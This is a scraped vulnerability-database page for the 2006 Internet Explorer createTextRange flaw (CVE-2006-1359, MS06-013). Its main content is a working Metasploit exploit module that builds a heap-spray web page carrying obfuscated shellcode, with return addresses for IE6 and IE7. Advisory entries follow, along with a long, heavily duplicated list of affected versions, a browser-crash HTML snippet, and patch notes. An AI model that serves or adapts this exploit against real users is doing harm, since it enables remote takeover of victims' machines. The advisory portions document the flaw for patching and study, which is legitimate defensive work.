				used by this exploit was pioneered by Skylined.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'Faithless <rhyskidd [at] gmail.com>',
					'Darkeagle <unl0ck.net>',
					'hdm',
					'<justfriends4n0w [at] yahoo.com>',
					'anonymous',
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2006-1359'],
					['OSVDB', '24050'],
	  				['MSB', 'MS06-013'],
					['BID', '17196'],
					['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
					['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
					['URL', 'http://www.kb.cert.org/vuls/id/876678'],
					['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
					['URL', 'http://www.shog9.com/crashIE.html'],
				],
			'Payload'        =>
				{
					'Space'          => 1024,
					'BadChars'       => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)', { 'Ret' => 0x746F9468 } ],
					[ 'Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)', { 'Ret' => 0x3C0474C2 } ],
					
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 19 2006'))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		
		# Create some nops
		nops = Rex::Text.to_unescape(make_nops(4))

		# Generate a random XML namespace for VML
		xmlns = rand_text_alpha(rand(30)+2)

		# Randomize the javascript variable names	
		rnd              = rand(3)
		var_inputtype    = ((rnd == 0) ? "checkbox" : ((rnd == 1) ? "radio" : "image"))
		var_inp          = "_"+rand_text_alpha(rand(6)+3)
		var_tmp          = "_"+rand_text_alpha(rand(6)+3)
		var_payload      = "_"+rand_text_alpha(rand(6)+3)
		var_nopslide     = "_"+rand_text_alpha(rand(6)+3)
		var_slidesize    = "_"+rand_text_alpha(rand(6)+3)
		var_fillblock    = "_"+rand_text_alpha(rand(6)+3)
		var_memblock     = "_"+rand_text_alpha(rand(6)+3)
		var_heap         = "_"+rand_text_alpha(rand(6)+3)
		var_index        = "_"+rand_text_alpha(rand(6)+3)
		var_maxIndex     = "_"+rand_text_alpha(rand(6)+3)
		var_fillHeap     = "_"+rand_text_alpha(rand(6)+3)
		var_start        = "_"+rand_text_alpha(rand(6)+3)
		var_timer        = "_"+rand_text_alpha(rand(6)+3)
		rnd              = rand(2)
		var_setTimeout   = (rnd == 0) ? "setTimeout('#{var_fillHeap}()', 5)" : ""
		var_setInterval  = (rnd == 1) ? "setInterval('#{var_fillHeap}()', 5)" : ""
		
		# Build out the message
		content = %Q|
<html >
<head >
	<script language = "javascript" >
    var #{var_payload} = unescape("#{shellcode}") ;

    var #{var_nopslide} = unescape("#{nops}") ;
    var #{var_slidesize} = 20+#{var_payload}.length ;
    while (#{var_nopslide}.length<#{var_slidesize})
    {
        #{var_nopslide} += #{var_nopslide} ;
    }    

    var #{var_fillblock} = #{var_nopslide}.substring(0,#{var_slidesize}) ;
    var #{var_memblock} = #{var_nopslide}.substring(0,#{var_nopslide}.length-#{var_slidesize}) ;

    while(#{var_memblock}.length+#{var_slidesize} < 0x40000)
    {
        #{var_memblock} += #{var_fillblock} ;
    }    

    var #{var_heap} = new Array() ;
    var #{var_index} = 0 ;
    var #{var_maxIndex} = 2020 ;
    
    function #{var_fillHeap}() {
      #{var_timer}.innerHTML = Math.round((#{var_index}/#{var_maxIndex})*100) ;
      if (#{var_index}<#{var_maxIndex}) {
        #{var_heap}.push(#{var_memblock}+#{var_payload}) ;
        #{var_index}++ ;
        #{var_setTimeout}
      }
      else {
        #{var_timer}.innerHTML = 100 ;
        #{var_inp} = document.createElement("input") ;
        #{var_inp}.type = "#{var_inputtype}" ;
        #{var_tmp} = #{var_inp}.createTextRange() ;        
      }
    }   
    
    function #{var_start}() {
      #{var_setTimeout}#{var_setInterval}
    }
	</script >
</head >
<body onload = "#{var_start}()"  >
<span id = "#{var_timer}" > % </span >
</body >
</html >
		|

		content = Rex::Text.randomize_space(content)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)
		
		# Handle the payload
		handler(cli)		
	end

end
    

- 漏洞信息

24050
Microsoft IE createTextRange() Function Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity Workaround, Upgrade
Exploit Public, Exploit Commercial

- 漏洞描述

Microsoft Internet Explorer contains a flaw that may allow a malicious user to execute arbitrary commands. The issue is triggered due to a memory corruption error when processing a specially crafted "createTextRange()" call associated with a "checkbox" object. It is possible that the flaw may allow attackers to remotely take complete control of an affected system resulting in a loss of integrity.

- 时间线

2006-03-22 2006-02-10
2006-03-25 Unknow

- 解决方案

Upgrade to version 7.0 Beta 2 Preview that was released on March 20, 2006 or higher, as it has been reported to fix this vulnerability. It is also possible to mitigate the flaw by implementing the following workaround: Disable Active Scripting support in the Internet security zone. Note: Disabling Active Scripting may cause some Web sites to work incorrectly.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability
Design Error 17196
Yes No
2006-03-22 12:00:00 2006-04-17 06:02:00
Discovered by Joshua Heyer.

- 受影响的程序版本

Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 7.0 beta2
Microsoft Internet Explorer 6.0 SP2 - do not use
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional

- 漏洞讨论


Microsoft Internet Explorer is susceptible to a remote code-execution vulnerability. This issue is due to a flaw that results in an invalid table-pointer dereference.

Remote attackers may exploit this issue to crash affected browsers or to execute arbitrary machine code in the context of affected users.

Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview.

- 漏洞利用

The following HTML content demonstrates this issue by crashing the browser:

<input type="checkbox" id='c'>
<script><!--
r=document.getElementById("c");
a=r.createTextRange();
--></script>

Exploit code is available.

- 解决方案


The Internet Explorer 7 Beta 2 Preview released on March 20, 2006 is not affected by this vulnerability. Users of earlier Internet Explorer 7 beta releases are advised to upgrade. Updates are not currently available for other Internet Explorer releases.

Microsoft has released a cumulative update to address this issue. Please see the referenced advisories for further information.

Reportedly, the fixes provided in MS06-013 may cause unintended breakage with certain ActiveX controls. Symantec has not confirmed this. Before deploying this patch in production environments, users should thoroughly test the patch to ensure that it doesn't interfere with other software.


Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0 SP2 - do not use

Microsoft Internet Explorer 6.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站